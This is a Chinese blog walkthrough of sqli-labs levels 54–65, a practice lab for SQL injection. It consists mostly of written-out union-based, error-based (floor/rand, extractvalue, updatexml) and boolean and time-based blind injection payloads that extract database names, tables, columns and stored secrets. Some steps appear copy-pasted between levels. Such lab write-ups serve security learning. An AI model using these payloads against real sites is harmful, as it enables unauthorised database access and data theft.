sqllabs 54关以后及其总结

于 2024-07-15 09:52:56 发布
阅读量647 收藏 17
点赞数 10
文章标签: 网络 安全 sql注入 sql mysql 靶场练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74402888/article/details/140429968
版权

第54关

输入?id=1 and 1=2,可以确定是字符型

输入?id=1'    报错,添加--+正确确定闭合方式

输入?id=-1' union select 1,2,3--+,查看显示位

输入?id=-1' union select 1,database(),version()--+爆库,

输入?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+   爆表

爆表,输入?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='kmp4truhi7'--+

表名随时发生变化

?id=-1' union select 1,group_concat(sessid),group_concat(secret_JVJY) from kmp4truhi7 --+

id,sessid,secret_JVJY,tryy

Your Login name:0ee513926cb5aa8e358c9d6dcf80b70e
Your Password:w3iVtazXZEKC70RPJi28FVFv

第55关

输入?id=1 and 1=2确定类型是数值型但是门面测试发现位括号闭合

?id=-1) union select 1,2,3--+  判断回显位

?id=-1) union select 1,database(),version()--+爆库和版本

?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+爆表

?id=-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='kcpomoak73'--+爆字段

?id=-1) union select 1,group_concat(sessid),group_concat(secret_8NDU) from kcpomoak73--+爆数据

第56关

位?id=1’)   确定闭合方式

其余和55,54一样

?id=-1') union select 1,database(),version()--+爆库

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+爆表

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='i3kyp1zhxp'--+爆字段

?id=-1') union select 1,group_concat(sessid),group_concat(secret_V4RW) from i3kyp1zhxp--+爆数据

第57关

输入?id=1"--+尝试闭合,闭合成功

其余一样

?id=-1"union select 1,database(),version()--+爆库

?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+爆表

?id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='58dfsy83l6'--+爆字段

?id=-1" union select 1,group_concat(sessid),group_concat(secret_M6VT) from 58dfsy83l6--+爆数据

第58关

报错注入

?id=1' and (select count(*) from information_schema.tables group by concat(floor(rand(14)*2),0x5e,database()))--+爆库

?id=1' and (select count(*) from information_schema.tables group by concat(floor(rand(14)*2),0x5e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+爆表

?id=1' and (select count(*) from information_schema.tables group by concat(floor(rand(14)*2),0x5e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ymbx6ux1df')))--+ 爆字段

?id=1' and (select count(*) from information_schema.tables group by concat(floor(rand(14)*2),0x5e,(select sessid from ymbx6ux1df)))--+ 字段内容

第59关

报错注入extractvalue+数字型注入

?id=1 and extractvalue(1,concat(0x7e,database(),0x7e))--+

?id=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+爆表

?id=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='h0f7jl3wq5'),0x7e))--+爆字段

?id=1 and extractvalue(1,concat(0x7e,(select group_concat(sessid) from h0f7jl3wq5),0x7e))--+爆数据

第60关

报错注入updatexml  ?id=1") 闭合方式

?id=1") and updatexml(1,concat(0x7e,database(),0x7e),1)--+爆库

?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database()),0x7e),1)--+爆表

?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='02qxrg5nyz'),0x7e),1)--+爆字段

?id=1") and updatexml(1,concat(0x7e,(select group_concat(sessid) from 02qxrg5nyz),0x7e),1)--+爆数据

第61关

报错注入updatexml  ?id=1'))闭合方式

?id=1')) and updatexml(1,concat(0x7e,database(),0x7e),1)--+爆库

?id=1')) and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database()),0x7e),1)--+爆表

?id=1')) and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='02qxrg5nyz'),0x7e),1)--+爆字段

?id=1')) and updatexml(1,concat(0x7e,(select group_concat(sessid) from 02qxrg5nyz),0x7e),1)--+爆数据

第62关

布尔盲注+?id=1')闭合

?id=1') and length(database())>5--+判断库长度

?id=1') and substr(database(),1,1)>'m' --+判断数据库第一个字母

?id=1') and (select count(table_name) from information_schema.tables where table_schema=database())>5--+判断数据表张数>5

?id=1') and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5 --+判断第一张数据表的长度>5

?id=1') and mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)>'m'--+判断第一张数据表的第一个字母>m

?id=1') and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='8dvsmiadsa')>5 --+判断字段数>5

?id=1') and length((select column_name from information_schema.columns where table_schema=database() and table_name='8dvsmiadsa' limit 0,1))>5--+判断第一个字段的长度

?id=1') and mid((select column_name from information_schema.columns where table_schema=database() and table_name='8dvsmiadsa' limit 0,1),1,1)>'m'--+判断第一个字段第一个字母

?id=1') and (select count(sessid) from 8dvsmiadsa)>5--+判断sessid记录>5

?id=1') and mid((select sessid from 8dvsmiadsa limit 0,1),1,1)>'m'--+判断第一条记录的第一个字母>m

第62关

?id=1'     #无回显

?id=1'--+  #无回显

?id=1')--+ #有回显 用')闭合

?id=1')order by 3--+

?id=1')order by 4--+

?id=1')and if(length((select table_name from information_schema.tables where table_schema=database()))>100,1,sleep(10))--+

第63关

?id=1'     #无回显

?id=1'--+  #有回显 用'闭合

?id=1'order by 3--+

?id=1'order by 4--+

?id=-1'and union select 1,2,3--+   #无回显

?id=1'and sleep(10)--+   #延迟返回

payload

?id=1'and if(length((select table_name from information_schema.tables where table_schema=database()))>100,1,sleep(10))--+

第64关

?id=1))order by 3--+

?id=1))order by 4--+

?id=-1))union select 1,2,3--+  #没有返回有用消息

?id=1))and sleep(2)--+   #延迟返回

payload

?id=1))and if(length((select table_name from information_schema.tables where table_schema=database()))>100,1,sleep(10))--+

第65关

?id=1'        #有回显

?id=1"        #无回显

?id=1"--+     #无回显

?id=1")--+    #有回显 用")闭合

?id=-1")union select 1,2,3--+  #没有返回有用消息

?id=1")and sleep(2)--+   #延迟返回

payload

?id=1")and if(length((select table_name from information_schema.tables where table_schema=database()))>100,1,sleep(10))--+

总结思维导图

小春学渗透
关注
  • 10
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql-labs通技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
upload-labs一到二十一解题总结
最新发布
03-18
### Upload-Labs一到二十一解题总结 #### Pass-01: 一句话木马上传技巧 在这一中,玩家需要上传一个自制的PHP文件(通常是一句话木马)。上传过程中会遇到问题,有两种解决方法: 1. **禁用JavaScript**: -...
(白帽子学习笔记)前渗透——SQL注入
冬的博客
08-23 774
注入详解 目录 注入详解 SQL注入 SQL注入漏洞的产生必须满足两个条件: SQL注入漏洞的危害 注入判断: SQL注入类型: 数字型: 字符型: 布尔盲注: 时间盲注: 报错注入: 联合注入: 堆查询注入: 宽字节注入: 按注入点类型 数字型 字符型 搜索型 按执行效果类型 布尔盲注 时间盲注 报错注入 宽字节注入 DNSlog外带 sqli-labs部分总结 第五——基于'字符型报错 第六——基于"字符型报错 第七——文件读写注入 第八
SQL注入文章资料
bcbobo21cn的专栏
10-13 1347
sql注入 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。[1]  比如先前的很多影视网站泄露VI
通杀! 熬夜码的 - 八万字 - 让你一文读懂SQL注入漏洞原理及各种场景利用
易编橙 · 终身成长社群,相遇已是上上签!
10-24 1517
WEB攻防漏洞的本质 漏洞特定函数: 漏洞的成因必然会涉及到所用的函数,不同的开发语言都有一些特定的函数用于不同的作用。 有些函数用于数据库查询,有的函数用于文件读写,有的函数用于调试输出等。函数在使用的时候会和漏洞形成的系是什么? 漏洞产生的原因必定会使用到类似的脚本语言的特定函数,比如SQL注入漏洞,必然会涉及到数据库查询操作类的相函数。 这就是漏洞的特定函数。所以在代码层,我们就可以通过函数猜解存在有那些漏洞,反推也可以根据漏洞猜解使用了哪些特定函数。 传输可
SQL注入
weixin_33845881的博客
08-30 58
sql注入总结 2016-07-20 18:23:23标签:*** sql注入 web安全原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 、作者信息和本声明。否则将追究法律责任。http://wt7315.blog.51cto.com/10319657/1828167本实验测试是基于sqli-labs的实验环境环境配置:php+...
PHP知识一:系统知识总结
weixin_30642561的博客
08-01 709
这些是PHP的相系列知识,其中系统的讲述、总结了PHP效率优化与安全、PHP精华及性能优化、PHP缓存机制与静态化设计、PHP运行机 制、PHP版本特性、PHP函数相原理、PHP系统设计、PHP高级应用、PHP连接池方案、基础函数、PHP与WEB主要应用、PHP与MySQL 联、PHP中全局有、文件操作、图片操作、面象对象、FTP、正则、数组操作、实用函数等相知识。请认真研学,应该能...
SQL注入奇淫技巧——利用dnslog获取看不到的信息
weixin_33716154的博客
06-18 624
对于sql盲注,常用的方法应该是二分法了,为此之前还写过通过二分法猜解的半自动化python脚本,说实话,python甲苯比起手动真的已经是好多了,可是我内心其实还是挺怵写脚本的,而且这种脚本二分法猜解发送的请求频繁麻烦不说,还容易被waf检测到,以至于ip被封。于是最近学习了一种sql盲注的奇淫技巧。 ...
值得注的开源软件推荐
GitChat
04-12 3960
本场 Chat 我们来一起了解、学习一些常见的开源软件。 在这里我们把你可能用到的开源软件分成 4 大类 15 个小类 45 个软件去有层次的了解和学习。这些被选的开源软件都经过广泛应用、有用户群和稳定的更新频率,它们可能不是最流行的,但具有一定的代表性,提供给大家学习参考。 应用类:框架、企业应用、编辑器 数据类:数据科学、大数据、机器学习、汽车机器人 服务类:云计算、数据库、消息队列、服务器...
mysql注入天书(一)Basic Challenges
eWFuZw==的博客
09-06 826
【独家连载】mysql注入天书(一)Basic Challenges lcamry / 2016-1...
Linux下makefile教程
Terry
06-19 601
转自陈皓 (CSDN) 概述 —— 什么是makefile?或许很多Winodws的程序员都不知道这个东西,因为那些Windows的IDE都 为你做了这个工作,但我觉得要作一个好的和 professional的程序员,makefile还是要懂 。这就好像现在有这么多的HTML的编辑器,但如果你想成为一个专业人士,你还是要了解 HTML的标识的含义。特别在Unix下的软件编译,你
sqlilabs 75中文目录
01-11
SQLiLabs是一个专门用于学习和练习SQL注入技术的在线靶场。这个中文目录旨在为那些对英语不熟悉的学习者提供清晰的指引,使他们能够更好地理解和实践SQL注入的各种类型。 1. **基于错误的注入**:在Less-1到Less-4...
SQL-labs/less1通教程
02-29
从基础的GET传参到高级的SQL注入技巧,每一步都旨在帮助读者更好地理解SQL注入的工作原理及其防御方法。通过实践这些步骤,读者不仅可以学习到如何进行有效的SQL注入测试,还可以提高自身的安全意识和技能。
sql-labs 1-10 含多种解法 包括sqlmap py脚本
07-23
### SQL-Labs 1-10 解析与多种解法 #### Less-1:基本SQL注入 在这一中,玩家将面对一个常见的SQL注入点。注入点出现在URL参数中,例如`?id=1'`。此卡旨在考察用户是否了解SQL注入的基本原理及其应用。 **...
sqIi-labs,SQL注入平台
08-06
sqIi-labs:是一款学习SQL注入的开源平台,共有75种不同类型的注入 解压密码:ms08067.com sqIi-labs的使用文章见:https://blog.csdn.net/qq_41453285/article/details/100827739
sql-labs
03-07
"SQL-Labs" 是一个可能的数据库学习平台或者是一系列SQL练习题目集合,主要用于帮助用户提升SQL查询和数据处理技能。由于没有具体的标签提供更多信息,我们可以假设这是一个综合性的SQL实践项目,涵盖了各种SQL语言...
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs》是一本深入探讨SQL注入技术的专业资料,结合了sqli-labs实战平台,旨在帮助读者强化对SQL注入的理解和防御能力。SQL注入是一种常见的网络安全漏洞,攻击者通过在输入数据中嵌入恶意SQL代码...
sqli-labs第54
10-02
sqli-labs第54是一个GET请求的挑战,要求使用联合查询来获取数据。通过向URL后添加?id=-1'union select 1,database(),secret_X88U from challenges.bsfmy3ozu2 -- 来完成挑战。其中,-1是为了保证原始查询语句的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值